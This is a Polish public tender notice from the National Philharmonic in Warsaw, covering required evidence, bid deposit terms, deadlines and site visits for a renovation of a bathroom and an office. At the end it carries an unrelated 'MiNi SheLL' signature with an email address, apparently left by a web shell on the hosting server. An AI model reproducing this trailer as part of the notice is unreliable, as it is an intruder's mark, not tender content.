oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień ich złożenia, podmiotowych środków dowodowych, tj.:<br/>1. w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub<br/>zawodowej:<br/>- wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – zgodnie ze wzorem oświadczenia stanowiącym Załącznik nr 7 do SWZ;<br/>- wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia odpowiedzialnych za kierowanie robotami budowlanymi,<br/>wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie ze wzorem oświadczenia stanowiącym Załącznik nr 6 do SWZ;<br/>2. w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej lub<br/>finansowej:<br/>- dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający wymaga – w celu wykazania cechy równoważności, zgodnie z Rozdziałem 3 ust. 12 SWZ – złożenia zestawienia zaproponowanych urządzeń, instalacji, materiałów i innych elementów równoważnych wraz z ich opisem technicznym sporządzonym przez producenta i/lub wydruków ze stron internetowych producenta, bądź katalogów producentów pozwalających na ocenę zgodności oferowanych materiałów oraz ich parametrów z wymaganiami SWZ. Z przedłożonych przez Wykonawcę materiałów powinno wyraźnie wynikać, której pozycji dotyczą. Zamawiający zaakceptuje równoważne przedmiotowe środki dowodowe, jeśli potwierdzą one, że oferowane urządzenia, instalacje, materiały i inne elementy spełniają określone przez Zamawiającego wymagania. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jeżeli Wykonawca nie złożył przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym terminie, chyba że pomimo złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania. Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. W przypadku niezłożenia zestawienia, o którym mowa w Rozdziale 8 ust. 1 SWZ oraz innych przedmiotowych środków dowodowych wraz z ofertą, Zamawiający uzna, że Wykonawca zobowiązał się do wykonania Przedmiotu zamówienia z<br/>urządzeń, instalacji, materiałów lub innych elementów wskazanych w Opisie Przedmiotu Zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości: dla Części 1 – 5 000,00 zł; dla Części 2 – 3 000,00 zł. Wadium należy wnieść na następujących warunkach:<br/>- wadium wnosi się przed upływem terminu składania ofert;<br/>- wadium może być wnoszone – według wyboru Wykonawcy – w jednej lub kilku następujących formach: pieniądzu; gwarancjach bankowych; gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299 ze zm.). Wadium wnoszone w pieniądzu wpłaca się na rachunek bankowy Zamawiającego o numerze: 61 1130 1017 0020 1461 3520 0005 (w tytule przelewu należy podać nazwę, numer postępowania oraz część Przedmiotu zamówienia, którego dotyczy wadium). Za termin wniesienia wadium zostanie przyjęty termin uznania rachunku bankowego Zamawiającego. Wadium wnoszone w formie gwarancji lub poręczenia musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej. Wadium wnoszone w formie gwarancji lub poręczenia musi zawierać zobowiązanie gwaranta lub poręczyciela z tytułu wystąpienia zdarzeń, o których mowa w art. 98 ust. 6 p.z.p. oraz spełniać następujące warunki: musi zawierać klauzule zapłaty sumy wadialnej na rzecz Zamawiającego bezwarunkowo i na pierwsze żądanie; termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem, iż pierwszym dniem związania ofertą jest dzień składania ofert). Zamawiający odrzuci ofertę Wykonawcy, który nie wniósł wadium lub wniósł w sposób nieprawidłowy, lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 p.z.p. Okoliczności i zasady zwrotu wadium, jak też jego zatrzymania określa art. 98 p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający dopuszcza łączne spełnianie przez Wykonawców warunków udziału w postępowaniu wskazanych w Rozdziale 6 ust. 2 SWZ. Wymagania w zakresie spełnienia warunków udziału w postępowaniu w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostały uregulowane w Rozdziale 13. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie i na warunkach<br/>uregulowanych w art. 454-455 p.z.p. oraz we wzorze umowy, stanowiącym Załącznik nr 9 do SWZ. Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-26 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca sklada ofertę za pośrednictwem platformy dostępnej pod adresem: https://filharmonia.ezamawiajacy.pl/pn/filharmonia/demand/209943/notice/public/details</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-26 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamówienie powiązane jest z dwoma pozycjami z planu postępowań o udzielenie zamówień na rok 2025 zamieszczonego w Biuletynie Zamówień Publicznych nr 2025/BZP 00125688/02/P:<br/>1.1.1 Modernizacja łazienki w garderobie dyrygenta;<br/>1.1.2 Remont i wymiana wyposażenia gabinetu Dyrektora Artystycznego Filharmonii Narodowej w Warszawie.<br/><br/>Ofertę składa się w języku polskim, natomiast inne dokumenty lub oświadczenia w języku obcym (załączone do oferty) należy złożyć z tłumaczeniem na język polski, z zastrzeżeniem przedmiotowych środków dowodowych, które Wykonawca może złożyć w języku polskim lub języku angielskim. W razie jakichkolwiek wątpliwości uznaje się, że wersja w języku polskim jest wiążąca.<br/><br/>Zamawiający informuje, że złożenie ofert nie musi być poprzedzone odbyciem wizji lokalnej, niezależnie jednak od tego Zamawiający rekomenduje/zaleca dokonanie wizji lokalnej na terenie nieruchomości, o której mowa w ust. 7 Rozdziału 3. SWZ, przed upływem terminu składania ofert. Zamawiający dopuszcza możliwość odbycia wizji lokalnej w dni robocze w godzinach 8.00-16.00, po uprzednim uzgodnieniu terminu z Zamawiającym. <br/>W celu ustalenia terminu wizji należy skontaktować się z Zamawiającym za pośrednictwem Platformy lub za pośrednictwem wiadomości elektronicznej na adres e-mail: bkrajewska@filharmonia.pl. W czasie wizji lokalnej Zamawiający nie będzie udzielał wyjaśnień dotyczących zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com